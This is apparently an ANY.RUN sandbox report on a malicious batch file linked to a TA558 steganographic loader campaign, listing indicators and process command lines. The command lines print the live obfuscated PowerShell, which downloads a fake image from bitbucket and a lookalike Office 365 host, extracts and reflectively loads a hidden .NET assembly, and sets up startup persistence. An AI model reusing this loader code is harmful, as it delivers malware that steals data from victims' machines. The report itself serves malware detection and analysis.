File name: 4ix598.bat

Full analysis: https://app.any.run/tasks/bf41c96d-a02a-481b-93d4-d97be4daa563
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 27, 2025, 19:26:01
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: stegocampaign, payload, loader, reverseloader, auto-startup, ta558, apt, susp-powershell, crypto-regex
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, Non-ISO extended-ASCII text, with CRLF, NEL line terminators
MD5: 23C3470F4DAA563D06DE713A83090994
SHA1: 44653D3441F340DB124CC7B6DF9E7A880EA268FC
SHA256: 23B0E8E5892B4C9A872AF00F252BCA6004B187B89E23AF6C9D17F7CDCF22C393
SSDEEP: 384:6W6A68qp0a11G6wguI5aaZSxTysItFLjwPtO46zBy:6PA6840iLtpjSR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Create files in the Startup directory

      • powershell.exe (PID: 8012)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8012)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7732)
      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)
      • cmd.exe (PID: 2616)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 7352)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7732)
      • cmd.exe (PID: 2616)
    • Get information on the list of running processes

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)
    • Probably download files using WebClient

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)
    • Application launched itself

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 8012)
    • Connects to unusual port

      • RegAsm.exe (PID: 8152)
    • Found regular expressions for crypto-addresses (YARA)

      • RegAsm.exe (PID: 8152)
    • There is functionality for taking screenshot (YARA)

      • RegAsm.exe (PID: 8152)
  • INFO

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)
    • Reads the software policy settings

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
      • slui.exe (PID: 7492)
    • Create files in a temporary directory

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Disables trace logs

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Checks proxy server information

      • powershell.exe (PID: 7888)
      • slui.exe (PID: 7492)
      • powershell.exe (PID: 7352)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 8012)
      • conhost.exe (PID: 8020)
      • conhost.exe (PID: 1512)
    • Auto-launch of the file from Startup directory

      • powershell.exe (PID: 8012)
    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 7800)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 7800)
    • Found Base64 encoded access to processes via PowerShell (YARA)

      • powershell.exe (PID: 7800)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 7800)
    • Reads the computer name

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)
    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)
    • Manual execution by a user

      • cmd.exe (PID: 2616)
    • Checks supported languages

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)
No Malware configuration.
Total processes: 134
Monitored processes: 14
Malicious processes: 8
Suspicious processes: 0

Behavior graph

Graph nodes, in the order the page lists them ("no specs" and "#STEGOCAMPAIGN" are the page's own node labels): start, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe (#STEGOCAMPAIGN), powershell.exe, conhost.exe (no specs), regasm.exe, cmd.exe (no specs), conhost.exe (no specs), powershell.exe (no specs), powershell.exe (#STEGOCAMPAIGN), svchost.exe, regasm.exe (no specs), slui.exe

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID: 1512
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2196
CMD: C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 2616
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat""
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 5376
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft .NET Assembly Registration Utility
Exit code: 2
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7316powershell "$ddsdgo = 'Id@d@gd@Cd@d@WwBOd@GUd@dd@d@ud@FMd@ZQByd@HYd@aQBjd@GUd@Ud@Bvd@Gkd@bgB0d@E0d@YQBud@GEd@ZwBld@HId@XQd@6d@Dod@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@d@gd@D0d@Id@Bbd@E4d@ZQB0d@C4d@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@BUd@Hkd@cd@Bld@F0d@Ogd@6d@FQd@bd@Bzd@DEd@Mgd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@HUd@bgBjd@HQd@aQBvd@G4d@Id@BEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQBGd@HId@bwBtd@Ewd@aQBud@Gsd@cwd@gd@Hsd@Id@Bwd@GEd@cgBhd@G0d@Id@d@od@Fsd@cwB0d@HId@aQBud@Gcd@WwBdd@F0d@Jd@Bsd@Gkd@bgBrd@HMd@KQd@gd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@Id@d@9d@Cd@d@TgBld@Hcd@LQBPd@GId@agBld@GMd@dd@d@gd@FMd@eQBzd@HQd@ZQBtd@C4d@TgBld@HQd@LgBXd@GUd@YgBDd@Gwd@aQBld@G4d@dd@d@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ecd@ZQB0d@C0d@UgBhd@G4d@Zd@Bvd@G0d@Id@d@td@Ekd@bgBwd@HUd@dd@BPd@GId@agBld@GMd@dd@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@LQBDd@G8d@dQBud@HQd@Id@d@kd@Gwd@aQBud@Gsd@cwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@G8d@cgBld@GEd@YwBod@Cd@d@Kd@d@kd@Gwd@aQBud@Gsd@Id@Bpd@G4d@Id@d@kd@HMd@ad@B1d@GYd@ZgBsd@GUd@Zd@BMd@Gkd@bgBrd@HMd@KQd@gd@Hsd@Id@B0d@HId@eQd@gd@Hsd@Id@Byd@GUd@dd@B1d@HId@bgd@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@LgBEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQd@od@CQd@bd@Bpd@G4d@awd@pd@Cd@d@fQd@gd@GMd@YQB0d@GMd@ad@d@gd@Hsd@Id@Bjd@G8d@bgB0d@Gkd@bgB1d@GUd@Id@B9d@Cd@d@fQd@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@cgBld@HQd@dQByd@G4d@Id@d@kd@G4d@dQBsd@Gwd@Id@B9d@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@gd@D0d@Id@d@nd@Ggd@dd@B0d@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@yd@Cd@d@PQd@gd@Ccd@cd@Bzd@Dod@Lwd@vd@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@D0d@Id@d@gd@CQd@QgB5d@HQd@ZQBzd@Cd@d@Kwd@kd@EId@eQB0d@GUd@cwd@yd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Id@d@9d@Cd@d@Qd@d@od@Cgd@Jd@Bsd@GYd@cwBkd@G
Yd@cwBkd@Gcd@Id@d@rd@Cd@d@JwBid@Gkd@dd@Bid@HUd@YwBrd@GUd@dd@d@ud@G8d@cgBnd@C8d@YwB6d@Hgd@ed@B4d@Hgd@ed@B4d@Hod@ed@B2d@C8d@ZwBkd@GYd@Zwd@vd@GQd@bwB3d@G4d@bd@Bvd@GEd@Zd@Bzd@C8d@cd@Bpd@GMd@LgBqd@Hd@d@Zwd@/d@DEd@Nd@d@yd@DMd@Nd@d@0d@Ccd@KQd@sd@Cd@d@Kd@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@Csd@Id@d@nd@G8d@ZgBpd@GMd@ZQd@zd@DYd@NQd@ud@Gcd@aQB0d@Ggd@dQBid@C4d@aQBvd@C8d@MQd@vd@HQd@ZQBzd@HQd@LgBqd@Hd@d@Zwd@nd@Ckd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@EQd@bwB3d@G4d@bd@Bvd@GEd@Zd@BEd@GEd@dd@Bhd@EYd@cgBvd@G0d@Td@Bpd@G4d@awBzd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Gkd@Zgd@gd@Cgd@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@LQBud@GUd@Id@d@kd@G4d@dQBsd@Gwd@KQd@gd@Hsd@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBUd@GUd@ed@B0d@C4d@RQBud@GMd@bwBkd@Gkd@bgBnd@F0d@Ogd@6d@FUd@Vd@BGd@Dgd@LgBHd@GUd@dd@BTd@HQd@cgBpd@G4d@Zwd@od@CQd@aQBtd@GEd@ZwBld@EId@eQB0d@GUd@cwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HMd@dd@Bhd@HId@dd@BGd@Gwd@YQBnd@Cd@d@PQd@gd@Ccd@Pd@d@8d@EId@QQBTd@EUd@Ngd@0d@F8d@UwBUd@EEd@UgBUd@D4d@Pgd@nd@Dsd@Id@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@Id@d@9d@Cd@d@Jwd@8d@Dwd@QgBBd@FMd@RQd@2d@DQd@XwBFd@E4d@Rd@d@+d@D4d@Jwd@7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@pd@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bpd@GYd@Id@d@od@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwBld@Cd@d@Md@d@gd@C0d@YQBud@GQd@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwB0d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Ckd@Id@B7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@Kwd@9d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d
@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@Id@d@9d@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@FMd@dQBid@HMd@dd@Byd@Gkd@bgBnd@Cgd@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cwd@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GMd@bwBtd@G0d@YQBud@GQd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBDd@G8d@bgB2d@GUd@cgB0d@F0d@Ogd@6d@EYd@cgBvd@G0d@QgBhd@HMd@ZQd@2d@DQd@UwB0d@HId@aQBud@Gcd@Kd@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@KQd@7d@Cd@d@Id@d@gd@CQd@ZQBud@GQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bld@G4d@Zd@BGd@Gwd@YQBnd@Ckd@Owd@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@FId@ZQBmd@Gwd@ZQBjd@HQd@aQBvd@G4d@LgBBd@HMd@cwBld@G0d@YgBsd@Hkd@XQd@6d@Dod@Td@Bvd@GEd@Zd@d@od@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HQd@eQBwd@GUd@Id@d@9d@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@LgBHd@GUd@dd@BUd@Hkd@cd@Bld@Cgd@
JwB0d@GUd@cwB0d@Hd@d@bwB3d@GUd@cgBzd@Ggd@ZQBsd@Gwd@LgBId@G8d@YQBhd@GEd@YQBhd@GEd@cwBkd@G0d@ZQd@nd@Ckd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@G0d@ZQB0d@Ggd@bwBkd@Cd@d@PQd@gd@CQd@dd@B5d@Hd@d@ZQd@ud@Ecd@ZQB0d@E0d@ZQB0d@Ggd@bwBkd@Cgd@JwBsd@GYd@cwBnd@GUd@Zd@Bkd@GQd@Zd@Bkd@GQd@Zd@Bhd@Ccd@KQd@ud@Ekd@bgB2d@G8d@awBld@Cgd@Jd@Bud@HUd@bd@Bsd@Cwd@Id@Bbd@G8d@YgBqd@GUd@YwB0d@Fsd@XQBdd@Cd@d@Kd@d@nd@HQd@ed@B0d@C4d@OQd@5d@DMd@Nd@Bfd@Dkd@Mgd@yd@Dcd@Od@d@yd@Dgd@Nd@d@3d@DEd@XwBkd@GEd@bwBsd@Hkd@YQBwd@C8d@bgBpd@GEd@bQd@vd@Hcd@YQByd@C8d@dd@Byd@G4d@ZQBtd@HUd@bgd@vd@Gcd@bwBid@G0d@YQBzd@C8d@ZwByd@G8d@LgB0d@GUd@awBjd@HUd@YgB0d@Gkd@Ygd@vd@C8d@OgBzd@Ccd@Ld@d@gd@Ccd@MQd@nd@Cwd@Id@d@nd@Fcd@aQBud@GQd@bwB3d@HMd@VQBwd@GQd@YQB0d@GUd@Jwd@sd@Cd@d@JwBSd@GUd@ZwBBd@HMd@bQd@nd@Cwd@Id@d@nd@Dd@d@Jwd@pd@Ckd@fQB9d@Dsd@Cgd@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($ddsdgo.replace('d@','A')));powershell.exe $OWjuxD"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7352"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" " [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.9934_9227828471_daolyap/niam/war/trnemun/gobmas/gro.tekcubtib//:s', '1', 'WindowsUpdate', 'RegAsm', '0'))}}; "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7492
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 7732
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\4ix598.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 7740
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
